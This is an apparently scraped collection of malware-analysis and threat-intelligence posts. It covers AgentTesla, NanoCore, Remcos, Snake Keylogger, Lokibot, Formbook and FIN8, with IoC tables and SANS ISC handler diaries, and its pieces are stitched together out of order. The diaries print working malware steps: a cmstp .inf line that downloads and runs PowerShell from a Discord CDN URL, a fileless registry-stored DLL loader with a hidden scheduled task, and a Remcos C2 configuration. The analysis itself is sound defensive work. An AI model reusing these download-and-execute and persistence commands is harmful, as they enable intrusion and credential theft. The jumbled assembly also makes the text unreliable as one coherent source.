HashDescripción80F43EA09F4918F80D4F7D84FDB6973CCAADDE05PowerShell/TrojanDownloader.Agent.GNZ75ADD0E232AB4164285E7804EC5379BFA84C0714PowerShell/TrojanDownloader.Agent.GNZ64F199EDAC6B3A8B1D994B63723555B162563B32PowerShell/TrojanDownloader.Agent.GNZ1652619B5095EEA2AFEC3A03B920BF63230C8C8APowerShell/TrojanDownloader.Agent.GNZD86960DD7B093DD0F3EF1DC3BC956D57217BD4ECPowerShell/TrojanDownloader.Agent.GNZ9754596E9E8B0A6E053A4988CF85099C2617A98BMSIL/TrojanDownloader.Agent.NEN1ECA09DC9001A0B6D146C01F5B549DD96A0BFE5DMSIL/Spy.AgentTesla.F

Dominios e IPs detectados en muestrashttps[:]//firebase[.]ngrok[.]ioftp[.]sisoempresarialsas.com195[.]178.120.243[.]22.30.4051[.]161.116.202

NanoCore

El troyano de acceso remoto (RAT) NanoCore se descubrió por primera vez en 2013, teniendo una amplia variedad de funciones como keylogger. Además, tiene la capacidad de manipular y observar a través de cámaras web, bloqueo de pantalla, descarga y robo de archivos, etc.

El actual NanoCore RAT se está propagando a través de una campaña de malware que utiliza ingeniería social en la que el correo electrónico contiene un recibo de pago bancario falso y una solicitud de presupuesto. Los correos electrónicos también contienen archivos adjuntos maliciosos con extensión .img o .iso, los cuales son utilizados para almacenar volcados sin procesar de discos magnéticos o discos ópticos.

Fig. 2. Correo de phishing con archivo adjunto infectado con NanoCore. (Fuente: welivesecurity.com)

Otra versión de NanoCore también se distribuye en campañas de phishing mediante un archivo ZIP especialmente diseñado para eludir las herramientas de correo electrónico seguras. El archivo ZIP malicioso puede ser extraído por ciertas versiones de PowerArchiver, WinRar y el antiguo 7-Zip. La información robada se envía a los servidores de comando y control (C&C) del atacante del malware.Esta RAT recopila los siguientes datos y los envía a sus servidores:

Credenciales de correo electrónico de clientes de correo populares.

Nombres de usuario y contraseñas del navegador.

Información de cuentas almacenadas de clientes de protocolo de transferencia de archivos (FTP) o software de gestión de archivos.

Impacto:

Comprometer la seguridad del sistema utilizando sus capacidades de puerta trasera para ejecutar comandos maliciosos.

Violación de la privacidad del usuario mediante la recopilación de credenciales de usuario, registrando pulsaciones de teclas y robando información sensible.

IoC de NanoCore

TipoIoCFileHash14e0cf11ec1913e7474c170ca9bfc3b7c739dfb4FileHash8ab96a03abd7f1de37ad67e7d7336ad3f4ac2433FileHashdf91988bd511978777677d476736682fFileHashbfb464624e77cd6469df2eda0a2962a6FileHashb0a39fb6cf64eb83c6b7055d7f645c9aFileHashaee72977f81a3be62e3039cc79c688b9FileHashf34d5f2d4577ed6d9ceec516c1f5a744FileHash4b6fb5ab17ca6ffa768c4ad63571f547URLhttp://93.184.220.29:80Dominiocobind.comFileHash2a2e1ab68249e6152a30c3dbaa6e4d56996aadef455a796aae5fc202c1831936FileHash3f611c21ac35512e1fb39d244a9f2b274258fb28a06e4cab93f9af15df0433d8URLhttps://hydramecs.com/NA.exeURLttps://45.12.253.105/NA.exeIP168.119.0.173IP152.89.218.40IP104.168.65.245

RemcosRAT

El software Remcos, comercializado como un software legítimo por la empresa alemana Breaking Security para gestionar remotamente sistemas Windows, es ahora ampliamente utilizado en múltiples campañas maliciosas por parte de actores de amenazas. Remcos es un sofisticado troyano de acceso remoto (RAT) que puede utilizarse para controlar y vigilar por completo cualquier ordenador con Windows a partir de XP.

La campaña actual utiliza una técnica de ingeniería social en la que las amenazas aprovechan las novedades y tendencias mundiales. Por ejemplo, el correo electrónico de phishing contiene un PDF que ofrece medidas de seguridad contra el CoronaVirus, pero en realidad este PDF incluye un ejecutable para un dropper REMCOS RAT que se ejecuta junto con un archivo VBS que ejecuta el malware. El malware también añade una clave de registro de inicio en «HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce» para que sea persistente mientras se reinicia el dispositivo afectado.

Este Backdoor recopila la siguiente información y la envía a sus servidores:

Información del ordenador (versión del SO, nombre del ordenador, tipo de sistema, nombre del producto, adaptador principal).

Información del usuario (acceso del usuario, perfil del usuario, nombre del usuario, dominio del usuario).

Información del procesador (número de revisión del procesador, nivel del procesador, identificador del procesador, arquitectura del procesador).

A continuación, se presenta un ejemplo de un intento de phishing con un documento adjunto que en realidad esconde archivos ejecutables:

Fig. 3. Correo de phishing con archivo adjunto infectado con RemcosRAT. (Fuente: success.trendmicro.com)

Aunque Breaking Security promete que el programa solo está disponible para aquellos que pretendan utilizarlo con fines legales, en realidad, Remcos RAT ofrece a los clientes todas las funciones necesarias para lanzar ataques potencialmente destructivos. El malware se puede adquirir con diferentes criptodivisas.

IoC de RemcosRAT

TipoIoCHASH6d25e04e66cccb61648f34728af7c2f2HASHF331c18c3f685d245d40911d3bd20519HASH8cea687c5c02c9b71303c53dc2641f03DOMINIOhttp[:]//geoplugin.net/json.gpDOMINIOfalimore001[.]hopto.orgIP178[.]237.33.50IP194[.]147.140.29

SnakeKeylogger

Snake Keylogger es una variante de malware peligrosa que puede dar lugar a una violación de datos u otro incidente de ciberseguridad importante en una organización. Este malware es actualmente una de las principales variantes, convirtiendose, según la entidad de ciberseguridad Checkpoint, en la segunda más común en 2022. Sin embargo, es solo una de las ciberamenazas a las que se enfrentan las organizaciones. Como sucede con esta familia de herramientas utilizada por la ciberdelincuencia, su función es registrar las pulsaciones en los teclados de los usuarios y transmitir los datos recogidos a los ciberdelincuentes.

Mediante un análisis desarrollado por la misma entidad, se ha observado que Snake Keylogger reúne varias tácticas de evasión escurridizas. Hace ingeniería social con sus víctimas, se dirige a organizaciones/usuarios que no han parcheado un exploit conocido, y utiliza una variedad de giros y vueltas en un esfuerzo por evadir los productos antivirus (AV) tradicionales.

En una reciente campaña de amenazas, Snake Keylogger se distribuyó mediante un downloader que utiliza un tipo de archivo poco convencional como señuelo, además de utilizar archivos incrustados dentro de ese señuelo, shellcode cifrado y exploits de ejecución remota de código. Debido a la familiaridad del público con los formatos de Microsoft Office, los archivos DOC y XLS tienden a ser los documentos señuelo elegidos por los actores de amenazas. Por ello, es mucho menos frecuente ver un archivo PDF como el utilizado por esta amenaza como vector inicial de un ataque.

Mecanismo de infección y operación

HP Wolf Security descubrió recientemente esta amenaza al encontrarse con un archivo PDF adjunto llamado «REMMITANCE INVOICE.pdf». Al ejecutar este archivo, se solicita al usuario que abra un archivo DOCX, cuyo nombre engañoso es «ha sido verificado. Sin embargo, PDF, Jpeg, xlsx, .docx». Esta extraña elección del nombre del archivo fue elegida por una razón específica; a simple vista, el nombre del archivo hace que parezca como si el archivo hubiera sido examinado y verificado automáticamente por la máquina de la víctima, como se muestra en la siguiente infección.

Fig. 4. Mensaje mostrado después de abrir «REMMITANCE INVOICE.pdf». (Fuente: blogs.blackberry.com)

Se trata de un tipo de ingeniería social que depende en gran medida de que la víctima sólo observe superficialmente a la ventana emergente. El autor de la amenaza espera que la víctima esté demasiado ocupada o distraída para leer correctamente el cuadro de diálogo «Abrir archivo», lo que significa que muchas personas que trabajan en un entorno de oficina de ritmo rápido pueden ser víctimas de esta amenaza.

Si se abre este archivo DOCX y la víctima activa las macros, se desencadena la descarga de un archivo RTF mientras se muestra el documento con nombre extraño en Microsoft Word. Los usuarios que se fijen bien también verán que Word llega a una determinada URL mientras se carga, como se muestra en la Figura 5, coincidiendo con peticiones DNS a la misma URL.

Fig. 5. URL generada al abrir el archivo en Word. (Fuente: blogs.blackberry.com)

Una vez que el shellcode del archivo RTF descarga el keylogger, Snake Downloader ha hecho su trabajo, y ahora le toca a Snake Keylogger continuar a partir de aquí. Keyloggers como Snake acechan en segundo plano en una máquina infectada y esperan a que el usuario introduzca cualquier información jugosa a través del teclado, en particular los inicios de sesión de sitios web, como los utilizados para la banca o una billetera de criptomoneda. Esa información se filtra de vuelta a los actores de la amenaza y se utiliza para su propio beneficio financiero.

Por lo tanto, aunque puede ser menos común ver PDFs utilizados como archivos adjuntos maliciosos, todavía deben ser tomados con la misma seriedad y manejados con las mismas precauciones que cualquier otro archivo adjunto potencialmente infectado. En el caso de Snake Downloader, el documento señuelo es sólo el primer paso de una serie de tácticas utilizadas para ocultar la instalación de la carga útil de Snake Keylogger.

IoC de SnakeKeyLogger

TipoIoCemailrafaitul.islam@itl-group.com.bdemailbosstle@rfebatics.xyzdomaingbtak.irURLhttp://gbtak.ir/wp-content/Ygjklu.logIPv423.105.140.58Hashec9d7e5d8e7911dc4dce591020dfa8aeHash7fdb6c28e795b5b8f6be839cd7e848c5Hash3c4a7e9190b1a50443d7c54f6b1ca19cHash05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341dHash250d2cd13474133227c3199467a30f4e1e17de7c7c4190c4784e46ecf77e51feHash165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3fHashf1794bfabeae40abc925a14f4e9158b92616269ed9bcf9aff95d1c19fa79352eHash20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803

Lokibot

Lokibot, también conocido como Loki PWS o Loki-bot, es un malware perteneciente a la familia de troyanos que está activo desde 2015 y es utilizado desde entonces en campañas a nivel global. Fue diseñado con el objetivo de robar credenciales de navegadores, clientes FTP/ SSH, sistemas de mensajería, y hasta incluso de billeteras de criptomonedas.

Originalmente fue desarrollado en lenguaje C y promocionado en foros clandestinos y mercados en la dark web. Las primeras versiones apuntaban simplemente al robo de billeteras de criptomonedas y contraseñas de aplicaciones utilizadas por la víctima, así como las almacenadas en Windows. Se puede definir a Lokibot también como un Malware-as-a-Service (MaaS); es decir, un malware que se ofrece como servicio para que terceros lo puedan utilizar. Por esta razón es que sigue representando una herramienta atractiva para los cibercriminales, ya que permite a los ciberdelincuentes desarrollar sus propias versiones de Lokibot.

Métodos de distribución

Lokibot se propaga por medio de campañas de phishing que incluyen archivos adjuntos maliciosos o URL embebidas. Estos adjuntos pueden ser archivos Word, Excel o PDF, u otro tipo de extensiones, como .gz o .zip que simulan ser archivos PDF o .txt.

A lo largo de los años, estas campañas fueron variando la temática que utilizaban como señuelo para enviar sus archivos adjuntos, desde una factura, una cotización o la confirmación de un supuesto pedido. Además, los atacantes comenzaron a enviar archivos adjuntos maliciosos con algún tema referido al COVID-19 para intentar atraer a los usuarios desprevenidos y convencerlos para que abran un archivo adjunto en sus correos:

Fig. 6. Correo de phishing que distribuye Lokibot utilizando el tema del COVID-19 como excusa. (Fuente: Microsoft Security Intelligence)

Características esenciales

Lokibot es un malware con características de troyano que roba información confidencial de los equipos comprometidos, como nombres de usuario, contraseñas, billeteras de criptomonedas y otro tipo de información. También se ha visto la distribución del payload de Lokibot para Windows mediante la explotación de viejas vulnerabilidades, como la CVE-2017-11882 en Microsoft Office.

Entre las principales características de este malware se destaca su capacidad de eliminar archivos, desactivar procesos del sistema, y el bloqueo de soluciones de seguridad instaladas en el dispositivo de la víctima.

Lokibot es implementado a través de una botnet conformada por equipos comprometidos que se conectan a servidores de C&C (Command and Control) para enviar los datos recopilados de la víctima. Una vez que el malware accede a la información sensible de la víctima exfiltra la información, comúnmente a través del protocolo HTTP. Por otra parte, una vez que logra infectar el dispositivo víctima crea un backdoor que permite a los cibercriminales descargar e instalar otras piezas de malware.

Para ganar persistencia en el equipo comprometido y continuar exfiltrando información, en primera instancia, y en el caso de que la víctima tenga privilegios de administrador, Lokibot modifica la clave de registro agregando una nueva entrada que será almacenada en HKEY_LOCAL_MACHINE. De lo contrario, se almacena hace dentro de HKEY_CURRENT_USER.

IoC de Lokibot

TipoIoCURLhttp://161.35.102.56/~nikol/?p=7554URLhttp://171.22.30.147/davinci/five/fre.phpURLhttp://137.74.157.83/bul0/1/pin.phpURLhttp://161.35.102.56/~nikol/?p=882166721559URLhttp://185.246.220.60/sirR/five/fre.phpdomainkbfvzoboss.biddomainalphastand.windomainalphastand.tradedomainalphastand.topURLhttp://161.35.102.56/~nikol/?p=27226656008URLhttp://161.35.102.56/~nikol/?p=7398172063URLhttp://23.95.85.181/0789/vbc.exeURLhttp://136.243.159.53/~element/page.php?id=172

FormBook

Formbook es un malware del tipo infostealer que recolecta y roba información sensible de la máquina de una víctima, como credenciales de acceso, capturas de pantalla, y otro tipo de información, y luego envía estos datos a un servidor controlado por los cibercriminales. Está en actividad desde el 2016 y funciona bajo el modelo de Malware-as-a-Service (MaaS), por lo que suele ser comercializado en foros clandestinos.

Bajo este servicio conocido como MaaS los cibercriminales obtienen, por un lado, acceso al código malicioso para propagarlo sobre las víctimas, y por otro lado tienen acceso a un panel de administración donde pueden monitorear los equipos infectados. Con respecto a la propagación del código malicioso, la misma va por cuenta de los cibercriminales, que lo distribuyen a través de sus propios medios o contratando algún servicio que lo haga por ellos.

Por último, Formbook posee un comportamiento que lo destaca, que es el de formgrabber. Un formgrabber es un tipo de malware que recolecta la información que la víctima inserta dentro de un navegador de Internet, por ejemplo, las credenciales de acceso en una pantalla de Inicio de Sesión, antes de que esa información sea enviada. Esto lo logran interceptando las llamadas a las funciones de la API HTTP que son utilizadas por los navegadores de Internet para enviar la información hacia las páginas que un usuario consume mientras usa el navegador en cuestión.

Método de propagación

Este malware suele propagarse por medio de correos electrónicos de phishing que incluyen un archivo adjunto o una URL que lleve a la víctima a la descarga de este código malicioso. Estos correos pueden hacer referencia a distintas temáticas, como falsas órdenes de compra, pago de impuestos, transferencias, u otro tipo de ingeniería social que buscan hacer creer a las potenciales víctimas que es un correo legítimo para que abran enlace o el archivo adjunto.

A continuación, se ilutra un ejemplo de correos de phishing que distribuyen el malware Formbook.

Fig. 7. Correo de phishing que distribuye Formbook. (Fuente: welivesecurity.com)

Los últimos reportes provistos por el organismo Check Point Research (CPR), un proveedor líder de soluciones de ciberseguridad a nivel internacional, marcan que este malware se encuentra en el primer puesto en su último Índice de amenazas en globales de septiembre de 2022. Formbook afecta aproximadamente al 3% de las organizaciones en todo el mundo.

Vale la pena destacar que en algunos casos se ha observado que Formbook puede venir dentro de un Loader que posee distintas capas de ofuscación. Esta suele ser una práctica común que realizan los cibercriminales para intentar evadir soluciones de seguridad y también para hacer más complicado el proceso de investigación y análisis. A su vez, estos Loader utilizan distintas técnicas para determinar si se está ejecutando en una máquina virtual y también para persistir en la máquina de la víctima. Por último, se ha observado que pueden llegar a modificar los permisos de accesos sobre el archivo persistido para dificultar su eliminación del equipo infectado.

TipoIoCHash5bec1fc847c595a94fbe7efb0695c640URLhttp://180.214.236.4/spaceX/vbc.exeHash3d7958ca651c77eb1f3493bbdac0a04fDomainpokerdominogame[.]comDomainperabett463[.]comDomainorderjoessteaks[.]comDomainchristensonbrothers[.]comDomainskateboardlovers[.]comDomainsinergiberkaryabersama[.]comDomainsjsteinhardt[.]comDomaincabanatvs[.]comDomainjenaeeaginshair[.]comDomainhttps://urlhaus.abuse.ch/url/2245751/

Mecanismos para mitigar vulnerabilidades asociadas a cualquier tipo de malware

En caso de que no haya ningún indicio de que el correo sea malicioso revisar que ese destinatario sea válido.

No abrir ningún correo si hay motivos para sospechar, ya sea del contenido o de la persona que lo envió.

No descargar archivos adjuntos de correos si duda de su recepción o de cualquier otra cosa.

Revisar las extensiones de los archivos. Por ejemplo, si un archivo termina con “.pdf.exe” la última extensión es la que determina el tipo de archivo, en este caso sería “.exe”; es decir, un ejecutable.

Si un correo incluye un enlace que nos lleva a una página que nos pide nuestras credenciales para acceder, no ingresarlas, abrir la página oficial desde otro navegador u otra pestaña y acceder desde ese lugar.

Tener una política de cambio de contraseñas periódico.

Mantener actualizadas las soluciones de seguridad instaladas en el dispositivo.

Referencia:

https://www.eset.com/ec/security-report/

La entrada Malware AgentTesla en América Latina: Análisis técnico y cómo defenderse se publicó primero en CSIRT CEDIA.

tap 13 - 2023
FIN8 Group Using Modified Sardonic Malware for Deployment of BlackCat Ransomware

According to the Symantec Threat Hunter Team, the financially motivated threat actor known as FIN8 has been observed using an updated version of a malware called Sardonic to deliver the BlackCat ransomware. The update on the Sardonic malware is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. [1] The C++ based Sardonic backdoor has the ability to harvest system information and execute commands, and has a plugin system designed to load and execute additional malware payloads delivered as DLLs. Unlike the previous variant of Sardonic, which was designed in C++, the latest iteration packs in significant alterations, with most of the source code rewritten in C and modified so as to deliberately avoid similarities. In the latest incident analyzed by Symantec, Sardonic malware is embedded into a PowerShell script that was deployed into the targeted system after obtaining initial access. The script is designed to launch a .NET loader, which then decrypts and executes an injector module to ultimately run the implant. Successful infection leads to the deployment of BlackCat ransomware.

I found a phishing email that delivered a RAR archive (password protected). Inside the archive, there was a simple .bat file (SHA256: 57ebd5a707eb69dd719d461e1fbd14f98a42c6c3dcb8505e4669c55762810e70) with the following name: SRI DISTRITAL – DPTO DE COBRO -SRI Informa-Deuda pendiente.bat. Its current VT score is only 1/59![1]

Let’s have a look at this file! After the classic “@echo off”, there is a very long line that looks like a payload, it starts with “::”, a comment in .bat files (a common alternative to the REM command):

The payload looks encrypted and takes most of the file size. At the end of the script, we find some code that seems obfuscated, but we immediately can see a pattern (the human eye will always be more powerful than a computer)

The deobfuscated script reveals a piece of Powershell that uses the same technique:

Once beautified, we have this:

This confirms our idea! The script will read and decompress the payload from the original file (the line starting with “::”). The code reveals that the payload is split into two parts separated by q “:”.

$bxDfq=[System.Linq.Enumerable]::$xRIq([System.IO.File]::$cBAX([System.IO.Path]::$UAbP([System.Diagnostics.Process]::$TkRf().$rvdd.FileName, $null)), 1);
$dfqcx=$bxDfq.Substring(2).$oVot(‘:’);
$xlGba=aBhVu (PaVHU ([Convert]::$wYqi($dfqcx[0])));
$UiOEh=aBhVu (PaVHU ([Convert]::$wYqi($dfqcx[1])));

Let’s decode the two payloads with a simple Cyberchef recipe:

The two decrypted payloads are:

Payload1: ce8994715e43e82ec8eec439418ceef0fff238c661f873b069de402360bb671d
Payload2: af276f76e20bfcf9250335fe6bd895faf9c2b106a4edd23ea85594a7bd182635

Both are unknown on VT at this time.

The first payload launches a Powershell script that implements persistence via multiple technique like a scheduled task:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” Register-ScheduledTask -TaskName ‘OneDrive uXeplsWzSa’ -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute ‘C:UsersAdminAppDataRoaminguXeplsWzSa.vbs’) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

The uXeplsWzSa.vbs file contains:

CreateObject(“Shell.Application”).ShellExecute “””C:UsersREMAppDataRoaminguXeplsWzSa.cmd”””, “”, “”, “open”, 2

Unfortunately, the process crashes. The cmd file is the original .bat script. To increase the chances of making it run, I executed the script in a sandbox, and the final malware executed was ‘wkx5nrg2.isx.exe’ (SHA256:42BA54142CD9E5DE5C6370F26DB8AEE6870FF8D0E4A86546E855CDF6828621AD). This one is also unknown on VT but belongs to the Remcos[2] malware family. Here is the extracted config:

{
“c2”: [
“microsoftteams[.]con-ip[.]com:2450”
],
“attr”: {
“mutex”: “Rmcau1mstub-R03XGF”,
“copy_file”: “remcos.exe”,
“hide_file”: false,
“copy_folder”: “Remcos”,
“delete_file”: false,
“keylog_file”: “logslmilo.dat”,
“keylog_flag”: false,
“audio_folder”: “MicRecords”,
“install_flag”: false,
“keylog_crypt”: false,
“mouse_option”: false,
“connect_delay”: “0”,
“keylog_folder”: “logslilo”,
“startup_value”: “u0001”,
“screenshot_flag”: false,
“screenshot_path”: “%AppData%”,
“screenshot_time”: “10”,
“connect_interval”: “1”,
“hide_keylog_file”: true,
“screenshot_crypt”: false,
“audio_record_time”: “5”,
“screenshot_folder”: “Screenshots”,
“take_screenshot_time”: “5”,
“take_screenshot_option”: false
},
“rule”: “Remcos”,
“botnet”: “STUB1”,
“family”: “remcos”
}

[1] https://www.virustotal.com/gui/file/57ebd5a707eb69dd719d461e1fbd14f98a42c6c3dcb8505e4669c55762810e70
[2] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

aw-security-bulletin-UF-Featured-Image_d

On the 6th of July 2023, a joint advisory was published by CISA, the FBI, and CCCS (Canadian Center for Cyber Security) warning of a malware campaign actively exploiting a Remote Code Execution (RCE) vulnerability in Netwrix Auditor (CVE-2022-31199) for initial access. According to a July 2022 advisory by Bishop Fox, the security research firm … CVE-2022-31199: Truebot Malware Campaign Actively Exploiting Netwrix Auditor RCE Vulnerability

aw-security-bulletin-UF-Featured-Image_d

When dealing with malware analysis, you like to get “fresh meat”. Just for hunting purposes or when investigating incidents in your organization, it’s essential to have a triage process to reduce the noise and focus on really interesting files. For example, if you detect a new sample of Agent Tesla, you don’t need to take time to investigate it deeply. Just extract IOCs to share with your colleagues. From a business point of view, you don’t have time to analyze all samples!

How to perform your malware triage? It will help if you have tools for this (executed from a sandbox). There are a lot of tools to achieve this. Still, another critical element is “automation”: Your collected samples must feed a pipe of tools that will try to guess the malware family, extract config, … and why not archive and index everything? For this purpose, I’m using a local instance of mwdb[1] (MalwareDB). Coupled with karton [2]. For example, I’m extracting samples from catch-all mailboxes and sending them to the triage process via the REST API’s:

Mail > MIME-Extract > mwdb > karton > Analysis modules (sandbox, YARA, …)

But sometimes, you need to perform a quick analysis of a suspicious file manually, and you need “manual” tools. Recently, Jim (also FOR610 Instructor) found an interesting tool to achieve this task: Qu1ckSc0pe[3]. Why is this tool interesting? It can analyze multiple types of files: Windows, Linux, OSX binaries, Document files, APK files, and Archive files.

Written in Python, such tools usually require a lot of third-party modules and, therefore, are good candidates to be executed from a Docker container (to avoid pollution of your core OS with a lot of files and libraries). A simple Docker file is provided with the tool, but it was impossible to have a stable installation. So, I create my Dockerfile:

FROM ubuntu:22.04
MAINTAINER Xavier Mertens <xmertens@isc.sans.edu>

# Update & install required packages
RUN DEBIAN_FRONTEND=noninteractive apt update && apt -y upgrade && apt -y install sudo git python3-pip wget unzip

# Install main app
WORKDIR /app
COPY . .

# Stupid fix to allow non-interactive install
RUN sed -i “s/apt install/DEBIAN_FRONTEND=noninteractive apt -y install/g” setup.sh
RUN chmod a+x qu1cksc0pe.py setup.sh

# Another simple fix to avoid breaking the setup script
RUN ln -s /root /home/root
RUN ./setup.sh

# Missing dependencies
RUN pip3 install pycryptodome

# Install Radare2
WORKDIR /opt
RUN git clone https://github.com/radareorg/radare2
RUN radare2/sys/install.sh

WORKDIR /app
ENTRYPOINT [“/app/qu1cksc0pe.py”]

How to build the tool?

remnux@remnux:/opt$ git clone https://github.com/CYB3RMX/Qu1cksc0pe.git

Replace the existing Dockerfile with mine and build the image:

remnux@remnux:/opt/Qu1ckSc0pe$ docker built -t isc/quickscope .

Now, to use the tool, map a volume containing your samples:

Here is an example against a Word document with a VBA macro:

The Dockerfile must still be fine-tuned (for example, to create a volume to keep the YARA rules updated), but it already does the job.

Qu1ckScope has many features that I did not cover here. If interested, look at the repository that provides multiple examples of usage.

[1] https://github.com/CERT-Polska/mwdb-core
[2] https://github.com/CERT-Polska/mwdb-core
[3] https://github.com/CYB3RMX/Qu1cksc0pe

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

One of our Stormcast listeners, Kevin, wrote in to share that his friend Jon had received a direct spear-phishing e-mail. We requested for more information, and Jon kindly provided us with the corresponding e-mails and data to analyze. The spear-phishing e-mail sent to Jon masqueraded as an individual representing NordVPN (note: NordVPN had published an advisory about scammers posing as NordVPN representatives earlier this year [1]) and enquired about the possibility of a YouTube sponsorship/collaboration with his YouTube channel. I took the liberty to examine the phishing e-mail and its associated artifacts, noting the details I observed from my analysis.

Microsoft has used “.inf” files for a while[1]. They are simple text files and contain setup information in a driver package. They describe what must be performed to install a driver package on a device. When you read them, the syntax is straightforward to understand. The file is based on sections that describe what must be performed. One of them is very interesting for attackers: [RunPreSetupCommandsSection]. Note that .inf files cannot be executed “as is”.

The malicious file I found has the following section:

[RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -w hiDden iex ((New-Object System.Net.WebClient).DownloadString(‘hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119347463023759521/task.ps1’))
taskkill /IM CMsTp.exe /F

The payload ‘task.ps1’ contains the following code:

$webContent = Invoke-WebRequest -Uri “hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119333871213879356/get.txt”
New-Item -Path “HKCU:Softwarelath3”;
Set-ItemProperty -Path “HKCU:Softwarelath3” -Name “lath2” -Force -Value $webContent.Content;
$action = New-ScheduledTaskAction -Execute ‘powershell.exe’ -Argument ‘-w hiDden $you=[Convert]::FromBase64String((gp “HKCU:Softwarelath3”).lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()’
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -RunLevel Highest Force -Trigger $trigger -TaskName “Demo” -Description “Shane”

The payload ‘get.txt’ contains a Base64-encoded executable that will be decoded and loaded by Powershell. It’s a DLL with a VT score of 31/70 (SHA256:15b97c5182a30d4c85b31835b44d978dc065892587a7656038575bd32a62ac32).

The PowerShell script can be categorized as “fileless” because it saves the payload in a registry key (HKCU:Softwarelath3lath2) and creates a scheduled task to implement persistence. The PowerShell script will be launched every time the compromised host reboots.

They are interesting information in the .inf file:

[Strings] ServiceName=”CorpVPN”
ShortSvcName=”CorpVPN”

The file is called ‘cmstp.inf’. cmstp.exe is a LOLbin, provided by Microsoft tool for managing Connection Provider service profiles[2]. It can handle .inf files like this:

cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf

Here is the parent PowerShell script named uas32.ps1 (SHA256:20295311db1228935ddbba18678c88db78b4fc7efb54d2853cfb801851de0e19). It is obfuscated with a classic technique:

(NEw-Object MAnaGEMENt.auToMAtiON.psCreDENTIaL ‘ ‘, ( ‘ … <payload> … ‘ |coNVertTO-SEcUrEStrinG -ke (13..28))).GETNetwOrkCrEDentIal().PAsSWORD |Iex

I don’t cover the complete script because it’s not relevant. The interesting part is the following:

. Set-INFFile
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
If (Test-Path $InfFileLocation) {
#Command to run
$ps = new-object system.diagnostics.processstartinfo “c:windowssystem32cmstp.exe”
$ps.Arguments = “/au $InfFileLocation”
$ps.UseShellExecute = $false

The initial script will dump the file ‘cmstp.inf’ on disk and invoke cmstp.exe as described above. It is delivered to the victim in a CAB file (SHA256:fb4f92adc2a9c920ce9a77d1f66050c69728d1f3773c02f9da42e7809fb10d1c)

To resume, we have this flow of infection:

CAB file -> uas32.ps1 -> cmstp.exe with cmstp.inf -> Scheduled task -> Malicious DLL

[1] https://learn.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files
[2] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ESET ha descubierto una campaña de malware que apunta a países de Latinoamérica y distribuye un troyano de acceso remoto mediante phishing. El objetivo de esta campaña, denominada “Operación Guinea Pig”, es infectar a las víctimas con el malware AgentTesla, que permite a los atacantes realizar acciones nefastas sobre el host infectado.

Recientemente se ha descubierto una campaña de difusión de malware por medio de técnicas de phishing. Así lo ha detectado la empresa ESET, y dentro de los países más afectados están México, Perú, Colombia, Ecuador y Chile.

El objetivo final es infectar a las víctimas con un malware que permite a los atacantes realizar distintas acciones en el equipo infectado. Estas acciones van desde robar contraseñas, hasta realizar capturas de pantalla y luego enviar esta información a los servidores de los cibercriminales.

Acerca del malware AgentTesla

Agent Tesla es un malware del tipo remote access trojan (RAT) que está activo desde 2014 y que es distribuido como un Malware-as-a-Service (MaaS) en campañas a nivel global.

Este malware está desarrollado con el framework .NET y es utilizado para espiar y robar información de los equipos comprometidos, ya que cuenta con la capacidad de extraer credenciales de distintos software, obtener cookies de navegadores de Internet, registrar las pulsaciones del teclado de la máquina (Keylogging), así como realizar capturas de pantalla y del clipboard (portapapeles). Este código malicioso utiliza distintos métodos para el envío de la información recopilada hacia el atacante.

Métodos de propagación e infección

Esta amenaza suele propagarse por medio de correos electrónicos de phishing que incluyen un archivo adjunto malicioso con el cual buscan engañar al usuario que recibe el correo para hacer que descargue y ejecute este contenido. Por ejemplo, se utilizaban correos de la empresa de reparto DHL, tal como se puede observar a continuación:

Fig. 1. Correo de phishing en la Operación Guinea Pig. (Fuente: welivesecurity.com)

En el diagrama de la Fig. 2 se puede observar un ejemplo de cómo suele ser un proceso de infección con Agent Tesla. En este caso parte desde un correo con contenido malicioso, pasando por distintas fases en las que se descarga un código malicioso desde una URL para luego ser ejecutado, hasta llegar a la ejecución del payload final: Agent Tesla.

Fig. 2. Diagrama del proceso de infección de AgentTesla. (Fuente: welivesecurity.com)

Análisis técnico de un archivo infectado por AgentTesla

Por un lado, AgentTesla tiene dos clases (class) que contienen variables y métodos relacionados a la configuración. De estas clases de configuración el malware puede variar un poco en su comportamiento, pero principalmente es capaz de realizar las siguientes acciones:

Persistencia en la máquina de la víctima

Obtener la IP publica de la máquina de la victima

Obtener información de la máquina víctima (sistema operativo, CPU, RAM, nombre de usuario, etc.)

Tomar capturas de pantalla de la máquina de la víctima

Ejecutar un keylogger

Fig. 3. Variables de AgentTesla utilizadas para ganar persistencia. (Fuente: welivesecurity.com)

